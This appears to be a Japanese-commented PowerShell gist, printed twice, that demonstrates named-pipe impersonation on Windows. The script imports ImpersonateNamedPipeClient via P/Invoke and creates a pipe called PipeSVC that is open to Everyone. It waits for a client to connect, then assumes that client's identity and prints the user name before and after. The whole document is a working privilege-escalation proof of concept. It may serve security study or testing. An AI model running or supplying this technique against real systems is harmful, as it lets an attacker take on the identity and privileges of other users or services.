rnkgm/NamedPipeTest.ps1 Secret

## NamedPipeTest.ps1
# P/InvokeによりImpersonateNamedPipeClientをadvapi32.dllからインポート
$code = @"
using System;
using System.Runtime.InteropServices;

public static class Advapi32
{
   [DllImport("advapi32.dll")]
   public static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);
}
"@

Add-Type -Language CSharp -TypeDefinition $code

## Named Pipe Impersonation前のユーザ情報を出力
Write-Host "[>] Running as $([Environment]::UserName)"


# Step 1: Named Pipeを\\.\pipe\PipeSVCに作成）
$PipeName = "PipeSVC"
$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity
$AccessRule = New-Object System.IO.Pipes.PipeAccessRule('Everyone', 'ReadWrite', 'Allow')
$PipeSecurity.AddAccessRule($AccessRule)
$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName, 'InOut', 100, 'Byte', 'None', 1024, 1024, $PipeSecurity)
## Named Pipeのオブジェクトのハンドルを取得
$PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle()
Write-Host "[>] Named Pipe @ \\.\pipe\$($PipeName)"


# Step 2: 作成したNamed Pipeに対するデータの送信を待ち受け
Write-Host "[>] Waiting for pipe connection."
$Pipe.WaitForConnection()
$Null = (New-Object System.IO.StreamReader($Pipe)).ReadToEnd()


# Step 3: 作成したNamed Pipeにデータを送信したクライアントの権限を借用
if ([Advapi32]::ImpersonateNamedPipeClient([IntPtr] $PipeHandle))
{
   Write-Host "[+] Impersonation is successful."
}
else
{
   Write-Host "[-] Failed to inpersonation."
}

## Named Pipe Impersonation後のユーザ情報を出力
Write-Host "[>] Running as $([Environment]::UserName)"

$Pipe.Dispose()
	# P/InvokeによりImpersonateNamedPipeClientをadvapi32.dllからインポート
	$code = @"
	using System;
	using System.Runtime.InteropServices;

	public static class Advapi32
	{
	[DllImport("advapi32.dll")]
	public static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);
	}
	"@

	Add-Type -Language CSharp -TypeDefinition $code

	## Named Pipe Impersonation前のユーザ情報を出力
	Write-Host "[>] Running as $([Environment]::UserName)"


	# Step 1: Named Pipeを\\.\pipe\PipeSVCに作成）
	$PipeName = "PipeSVC"
	$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity
	$AccessRule = New-Object System.IO.Pipes.PipeAccessRule('Everyone', 'ReadWrite', 'Allow')
	$PipeSecurity.AddAccessRule($AccessRule)
	$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName, 'InOut', 100, 'Byte', 'None', 1024, 1024, $PipeSecurity)
	## Named Pipeのオブジェクトのハンドルを取得
	$PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle()
	Write-Host "[>] Named Pipe @ \\.\pipe\$($PipeName)"


	# Step 2: 作成したNamed Pipeに対するデータの送信を待ち受け
	Write-Host "[>] Waiting for pipe connection."
	$Pipe.WaitForConnection()
	$Null = (New-Object System.IO.StreamReader($Pipe)).ReadToEnd()


	# Step 3: 作成したNamed Pipeにデータを送信したクライアントの権限を借用
	if ([Advapi32]::ImpersonateNamedPipeClient([IntPtr] $PipeHandle))
	{
	Write-Host "[+] Impersonation is successful."
	}
	else
	{
	Write-Host "[-] Failed to inpersonation."
	}

	## Named Pipe Impersonation後のユーザ情報を出力
	Write-Host "[>] Running as $([Environment]::UserName)"

	$Pipe.Dispose()